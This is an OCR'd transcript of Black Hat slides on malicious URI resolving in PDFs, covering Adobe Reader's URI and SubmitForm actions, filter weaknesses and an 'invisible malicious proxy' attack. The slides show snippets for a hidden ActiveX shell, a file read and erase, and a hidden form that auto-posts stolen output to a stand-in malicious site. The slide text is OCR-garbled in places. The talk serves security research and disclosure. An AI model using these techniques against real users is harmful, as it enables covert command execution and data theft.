malicious)uriresolving)in)pdfs) - black hat briefings uri-ha… · malicious)uriresolving)in)pdfs)...
TRANSCRIPT
![Page 1: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/1.jpg)
Malicious URI resolving in PDFs
Valen6n HAMON Opera&onal cryptology and virology
laboratory (C+V)°
h<p://cvo-‐lab.blogspot.fr/
[email protected]‐ouest.fr
![Page 2: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/2.jpg)
Outline Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 3: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/3.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 4: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/4.jpg)
Ø PDF format : Ø Primarily cons6tuted of objects. Ø These objects can be dynamics:
Ø Javascript Ø Forms Ø Digital Media (SWF,…) Ø …
Introduc6on (1/2)
![Page 5: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/5.jpg)
And we know that Dynamic Objects => Security threats
\OpenAc-on
Introduc6on (2/2)
![Page 6: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/6.jpg)
Previous works : Eric Filiol, Black Hat EU 2008:
PDF Security analysis and malware threats. Raynal, Delugré and Aumaitre, Hack.lu 2009:
Malicious Origami in pdf. Didier Stevens, Hack.lu 2009:
Penetra&on document format.
Introduc6on (3/3)
![Page 7: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/7.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 8: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/8.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 9: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/9.jpg)
Network security in Adobe Reader URI Method (1/5)
RFC 3986 :"a Uniform Resource Iden6fier (URI) is a compact string of characters for iden6fying an abstract or physical resource".
A Uniform Resource Locator(URL) is an URI "that iden6fy resources via a representa6on of their primary access mechanism".
![Page 10: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/10.jpg)
Network security in Adobe Reader URI Method (2/5)
PDF reference 1.7: “a URI ac6on causes a URI to be resolved“. Lots of protocols are so supported : -‐ HTTP -‐ FTP -‐ MAILTO -‐ ...
![Page 11: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/11.jpg)
Network security in Adobe Reader URI Method (3/5)
4 0 obj <<
/Type /Ac6on /S /URI(hCp://www.malicioussite.com/upload.php)
>> endobj
Code:
![Page 12: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/12.jpg)
Network security in Adobe Reader URI Method (4/5)
Weblink Driver Default Web browser
IAC : Interapplica6on Communica6on Message
IAC
Weblink Plug-‐in
Request performed
![Page 13: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/13.jpg)
Network security in Adobe Reader URI Method (5/5)
Wireshark Capture of the request launched by the URI Ac-on
Internet Explorer 9
GET request performed:
![Page 14: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/14.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 15: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/15.jpg)
Network security in Adobe Reader Submit Form Method (1/8)
PDF reference 1.7: “a submit-‐form ac6on transmits the names and values of selected interac6ve form fields to a specified uniform resource locator (URL)“.
![Page 16: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/16.jpg)
Network security in Adobe Reader Submit Form Method (2/8)
4 0 obj <<
/S /SubmitForm /F <<
/F (hCp://www.malicioussite.com/upload.php) /FS /URL
>> >> endobj
Code :
![Page 17: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/17.jpg)
Network security in Adobe Reader Submit Form Method (3/8)
AcroForms
View results on the default web browser
Request performed
![Page 18: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/18.jpg)
Network security in Adobe Reader Submit Form Method (4/8)
Different file formats can be used for transmilng form data by PDF : -‐ HTML Form format -‐ Forms Data Format (FDF) -‐ XFDF, FDF version based on XML -‐ PDF
![Page 19: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/19.jpg)
Network security in Adobe Reader Submit Form Method (5/8)
Wireshark Capture of the request launched by the Submit Form Ac-on
POST request performed:
![Page 20: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/20.jpg)
Network security in Adobe Reader Submit Form Method (6/8)
The frame contains a FDF File:
![Page 21: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/21.jpg)
Network security in Adobe Reader Submit Form Method (7/8)
Note about Javascript: 4 0 obj <<
/JS( var aSubmitFields = new Array( "0" ); this.submitForm({ cURL: "hCp://www.malicioussite.com/upload.php", aFields: aSubmitFields, cSubmitAs: "FDF"
});) /S /JavaScript
>> endobj
![Page 22: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/22.jpg)
Network security in Adobe Reader Submit Form Method (8/8)
But Javascript should be enable in the user configura-on: HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader\9.0\JSPrefs => set to 0x00000001
![Page 23: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/23.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 24: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/24.jpg)
Network security in Adobe Reader Adobe URL filter (1/7)
By default, an alert Box appears:
![Page 25: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/25.jpg)
Network security in Adobe Reader Adobe URL filter (2/7)
To allow every websites: HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader\9.0\TrustManager\cDefaultLaunchURLPerms => Set value to 0x00000002
![Page 26: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/26.jpg)
Network security in Adobe Reader Adobe URL filter (3/7)
There is also a filter for file types (ONLY for Submit Form Method):
.HTML, .PDF , .FDF, .PHP, .ASP,.. (Web and Adobe files)
.EXE, .JS, .VBS,…
![Page 27: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/27.jpg)
Network security in Adobe Reader Adobe URL filter (4/7)
But there is no filter for URI Method ( Web browser’s job ):
ALL (including .exe, .vbs, etc.)
NONE ( It may depends on the web browser)
![Page 28: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/28.jpg)
Network security in Adobe Reader Adobe URL filter (5/7)
Demo **Opening a PDF can cause the automaHc
download of a malicious file**
=> Social engineering
![Page 29: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/29.jpg)
Web browser 1 : Mozilla Firefox
![Page 30: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/30.jpg)
Web browser 2 : MicrosoO Internet Explorer
![Page 31: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/31.jpg)
Web browser 3 : Google Chrome
![Page 32: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/32.jpg)
Network security in Adobe Reader Adobe URL filter (6/7)
Disadvantages: -‐ Hard to find a method to automa-cally launch the downloaded file (Ac-veX methods in IE could be used).
Advantages : -‐ Executables are well known aCacks. PDFs aCacks are less known. -‐ It works with every versions of Adobe Reader.
![Page 33: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/33.jpg)
Network security in Adobe Reader Adobe URL filter (7/7)
Force download
Big malicious executable
Launch a small ShellCode by a JS Exploit
Step 1
Step 2
Step 3
The ShellCode launch the big executable downloaded
![Page 34: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/34.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 35: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/35.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (1/5)
![Page 36: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/36.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (2/5)
With URI Method: The security configuraHon of the zone is well applied.
![Page 37: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/37.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (3/5)
C:\\Users\\CURRENT_USER\\AppData\\Local\\Temp\\AR95F6.htm
With Submit Form Method:
The web browser only knows this URI!!!
![Page 38: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/38.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (4/5)
![Page 39: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/39.jpg)
![Page 40: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/40.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (5/5)
**The web browser can not know the real URL** **Now, imagine that a URL is normally blacklisted in a web browser. If we use Submit Form, browser filter cannot be applied on the URL.**
![Page 41: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/41.jpg)
Weaknesses of Adobe’s URL Security Zone Manager (5/5)
With Adobe Reader version > 10: Ø Protected Mode.
HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader\10.0\Privileged\bProtectedMode
![Page 42: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/42.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 43: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/43.jpg)
An invisible malicious proxy (1/)
![Page 44: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/44.jpg)
An invisible malicious proxy (1/)
![Page 45: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/45.jpg)
An invisible malicious proxy (1/10) Step 1: Opening the PDF launch a HTTP request to the malicious Server
Ø /OpenAc-on Ø /SubmitForm Ac-on
![Page 46: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/46.jpg)
An invisible malicious proxy (1/)
![Page 47: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/47.jpg)
An invisible malicious proxy (2/10) Step 2: AcroForms performs the request, the file is downloaded in App Data/…
Ø C:\\Users\\CURRENT_USER\\AppData\\Local\\Temp\\AR95F6.htm
![Page 48: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/48.jpg)
An invisible malicious proxy (1/)
![Page 49: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/49.jpg)
An invisible malicious proxy (3/10) Step 3: Malicious ac&ons are done on the vic&m’s computer
Call a hidden shell: Ø Create a new WScriptShell Ac-veX Object
new AcHveXObject('WScript.Shell'); Ø Use Run method to launch the shell
wshShell.Run('cmd.exe /c dir > C:/Temp/Mylog.txt',0,true);
![Page 50: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/50.jpg)
An invisible malicious proxy (4/10) Step 3: Malicious ac&ons are done on the vic&m’s computer
Read the file and store in a JavaScript Variable: Ø Create a new ScripHng.FileSystemObject Ac-veX Object
new AcHveXObject('ScripHng.FileSystemObject');
Ø Read the file var New = Object2.OpenTextFile("C:/Temp/Mylog.txt",1); var read = New.ReadAll();
![Page 51: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/51.jpg)
An invisible malicious proxy (5/10) Step 3: Malicious ac&ons are done on the vic&m’s computer
Erase the file on the disk: Ø Create a new ScripHng.FileSystemObject Ac-veX Object
new AcHveXObject('ScripHng.FileSystemObject');
Ø Open again the file in « erase » mode var NouvTxt = Object.OpenTextFile("C:/Temp/Mylog.txt",2); NouvTxt.Close();
![Page 52: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/52.jpg)
Pro/Cons of this aCack (Ac-veX): Advantages : -‐ The Shell is hidden. -‐ Results can be sent back to a server. -‐ Don’t use AJAX(Asynchronous Javascript and XML) requests. -‐ Disadvantages: -‐ Works only with IE configured as default web browser. -‐ Registry keys needs to be set to use Ac-veX.
An invisible malicious proxy (6/10) Step 3: Malicious ac&ons are done on the vic&m’s computer
![Page 53: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/53.jpg)
NOTE:
** This is just an example, but all aCacks in web browsers can be used as long as files are accepted by AcroForms.**
An invisible malicious proxy (7/10) Step 3: Malicious ac&ons are done on the vic&m’s computer
![Page 54: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/54.jpg)
An invisible malicious proxy (1/)
![Page 55: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/55.jpg)
An invisible malicious proxy (8/10) Step 4: Send back results
Send back results to a web server: Ø Create an empty HTML Form
<form style="display: none; visibility: hidden" acHon="hhp://www.malicioussite.com" method="POST" name="form" enctype="mulHpart/form-‐data"> <input type=hidden name="file" value=""> </ form>
Ø Put the data to send document.getElementById ("file").value = read;
Ø Auto-‐submit the form document.form.submit ();
![Page 56: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/56.jpg)
An invisible malicious proxy (1/)
![Page 57: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/57.jpg)
An invisible malicious proxy (9/10) Step 5: Server-‐side recep&on in PHP
Ø Process HTTP POST requests received if (count ($ _POST)> 0) { ... }
Ø Write results in a file fopen(); fputs(); fclose();
![Page 58: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/58.jpg)
An invisible malicious proxy (10/10) Step 5: Server-‐side recep&on in PHP
Ø Auto-‐redirec-on to a legi-mate website: <form style="display: none; visibility: hidden" acHon="hhp://www.google.com" method="POST" name="form" enctype="mulHpart/form-‐data"> </ form> <script> document.form.submit(); </script>
![Page 59: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/59.jpg)
An invisible malicious proxy (Demo)
![Page 60: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/60.jpg)
![Page 61: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/61.jpg)
